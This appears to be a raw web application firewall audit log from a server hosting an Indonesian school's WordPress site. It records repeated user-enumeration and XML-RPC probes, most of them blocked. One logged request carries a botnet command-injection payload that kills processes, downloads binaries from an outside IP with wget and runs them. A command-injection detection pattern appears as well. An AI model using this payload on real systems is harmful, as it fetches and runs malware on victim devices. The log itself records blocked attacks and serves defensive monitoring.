ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ed21c5e-Z-- --035b0c6a-A-- [03/May/2025:23:57:02 +0700] aBZK3ileQJs6d7wanHHUEwAAANU 103.236.140.4 46554 103.236.140.4 8181 --035b0c6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.129 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --035b0c6a-C-- demo.sayHello --035b0c6a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --035b0c6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291422604296 6319 (- - -) Stopwatch2: 1746291422604296 6319; combined=4519, p1=590, p2=3590, p3=36, p4=36, p5=148, sr=77, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --035b0c6a-Z-- --33b6686e-A-- [03/May/2025:23:59:29 +0700] aBZLccP0ZqGY3Jj2X92biwAAABA 103.236.140.4 46632 103.236.140.4 8181 --33b6686e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --33b6686e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33b6686e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291569315172 3056 (- - -) Stopwatch2: 1746291569315172 3056; combined=1358, p1=448, p2=879, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33b6686e-Z-- --749e6c15-A-- [03/May/2025:23:59:35 +0700] aBZLd4OgvPi2IO4kz1sA5QAAAIQ 103.236.140.4 46636 103.236.140.4 8181 --749e6c15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.145 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --749e6c15-C-- demo.sayHello --749e6c15-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --749e6c15-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291575947792 5202 (- - -) Stopwatch2: 1746291575947792 5202; combined=4027, p1=457, p2=3345, p3=32, p4=32, p5=94, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --749e6c15-Z-- --c5e2c023-A-- [04/May/2025:00:00:15 +0700] aBZLn0SOhfQ6W15Bgg8QewAAAEA 103.236.140.4 46658 103.236.140.4 8181 --c5e2c023-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c5e2c023-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5e2c023-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291615483762 3200 (- - -) Stopwatch2: 1746291615483762 3200; combined=1459, p1=488, p2=940, p3=0, p4=0, p5=31, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5e2c023-Z-- --9826ce65-A-- [04/May/2025:00:00:22 +0700] aBZLpoOgvPi2IO4kz1sA7gAAAIA 103.236.140.4 46668 103.236.140.4 8181 --9826ce65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9826ce65-C-- demo.sayHello --9826ce65-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9826ce65-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291622292298 6078 (- - -) Stopwatch2: 1746291622292298 6078; combined=4443, p1=574, p2=3645, p3=31, p4=33, p5=93, sr=82, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9826ce65-Z-- --d6c94366-A-- [04/May/2025:00:00:48 +0700] aBZLwCleQJs6d7wanHHUFwAAANI 103.236.140.4 46684 103.236.140.4 8181 --d6c94366-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d6c94366-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6c94366-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291648454255 3197 (- - -) Stopwatch2: 1746291648454255 3197; combined=1345, p1=447, p2=867, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6c94366-Z-- --eb40fb1a-A-- [04/May/2025:00:00:53 +0700] aBZLxcP0ZqGY3Jj2X92bkAAAABU 103.236.140.4 46698 103.236.140.4 8181 --eb40fb1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --eb40fb1a-C-- demo.sayHello --eb40fb1a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb40fb1a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291653055041 6544 (- - -) Stopwatch2: 1746291653055041 6544; combined=4786, p1=646, p2=3741, p3=33, p4=37, p5=184, sr=80, sw=145, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb40fb1a-Z-- --715e1829-A-- [04/May/2025:00:03:39 +0700] aBZMa4OgvPi2IO4kz1sA9QAAAI4 103.236.140.4 46764 103.236.140.4 8181 --715e1829-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --715e1829-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --715e1829-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291819480984 3137 (- - -) Stopwatch2: 1746291819480984 3137; combined=1457, p1=502, p2=920, p3=0, p4=0, p5=35, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --715e1829-Z-- --d3b3b81b-A-- [04/May/2025:00:03:44 +0700] aBZMcESOhfQ6W15Bgg8QgwAAAE8 103.236.140.4 46772 103.236.140.4 8181 --d3b3b81b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3b3b81b-C-- demo.sayHello --d3b3b81b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3b3b81b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291824562404 6322 (- - -) Stopwatch2: 1746291824562404 6322; combined=4454, p1=557, p2=3624, p3=37, p4=37, p5=128, sr=75, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3b3b81b-Z-- --a3947477-A-- [04/May/2025:00:09:55 +0700] aBZN44OgvPi2IO4kz1sBIAAAAJA 103.236.140.4 46982 103.236.140.4 8181 --a3947477-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3947477-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3947477-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746292195569588 3118 (- - -) Stopwatch2: 1746292195569588 3118; combined=1334, p1=446, p2=857, p3=0, p4=0, p5=30, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3947477-Z-- --cdc3d129-A-- [04/May/2025:00:10:01 +0700] aBZN6USOhfQ6W15Bgg8QjwAAAEU 103.236.140.4 46992 103.236.140.4 8181 --cdc3d129-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cdc3d129-C-- demo.sayHello --cdc3d129-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdc3d129-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746292201952776 4440 (- - -) Stopwatch2: 1746292201952776 4440; combined=3015, p1=454, p2=2399, p3=25, p4=27, p5=65, sr=55, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdc3d129-Z-- --9f0fa957-A-- [04/May/2025:00:24:11 +0700] aBZRO4OgvPi2IO4kz1sBYQAAAIM 103.236.140.4 47416 103.236.140.4 8181 --9f0fa957-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9f0fa957-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f0fa957-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746293051301312 3329 (- - -) Stopwatch2: 1746293051301312 3329; combined=1470, p1=533, p2=902, p3=0, p4=0, p5=35, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f0fa957-Z-- --29caef6d-A-- [04/May/2025:00:24:19 +0700] aBZRQ0SOhfQ6W15Bgg8QqgAAAFA 103.236.140.4 47426 103.236.140.4 8181 --29caef6d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --29caef6d-C-- demo.sayHello --29caef6d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --29caef6d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746293059146345 6290 (- - -) Stopwatch2: 1746293059146345 6290; combined=4586, p1=574, p2=3604, p3=37, p4=37, p5=186, sr=79, sw=148, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29caef6d-Z-- --8ca3d45c-A-- [04/May/2025:00:55:15 +0700] aBZYg0SOhfQ6W15Bgg8RDAAAAEw 103.236.140.4 48550 103.236.140.4 8181 --8ca3d45c-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --8ca3d45c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ca3d45c-E-- --8ca3d45c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746294915542927 2393 (- - -) Stopwatch2: 1746294915542927 2393; combined=828, p1=504, p2=293, p3=0, p4=0, p5=31, sr=90, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ca3d45c-Z-- --7c930f17-A-- [04/May/2025:01:42:56 +0700] aBZjsESOhfQ6W15Bgg8RtgAAAEY 103.236.140.4 50416 103.236.140.4 8181 --7c930f17-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7c930f17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c930f17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746297776168302 2533 (- - -) Stopwatch2: 1746297776168302 2533; combined=1165, p1=393, p2=743, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c930f17-Z-- --23147252-A-- [04/May/2025:01:42:58 +0700] aBZjsileQJs6d7wanHHUzwAAANM 103.236.140.4 50420 103.236.140.4 8181 --23147252-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.210 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --23147252-C-- demo.sayHello --23147252-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --23147252-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
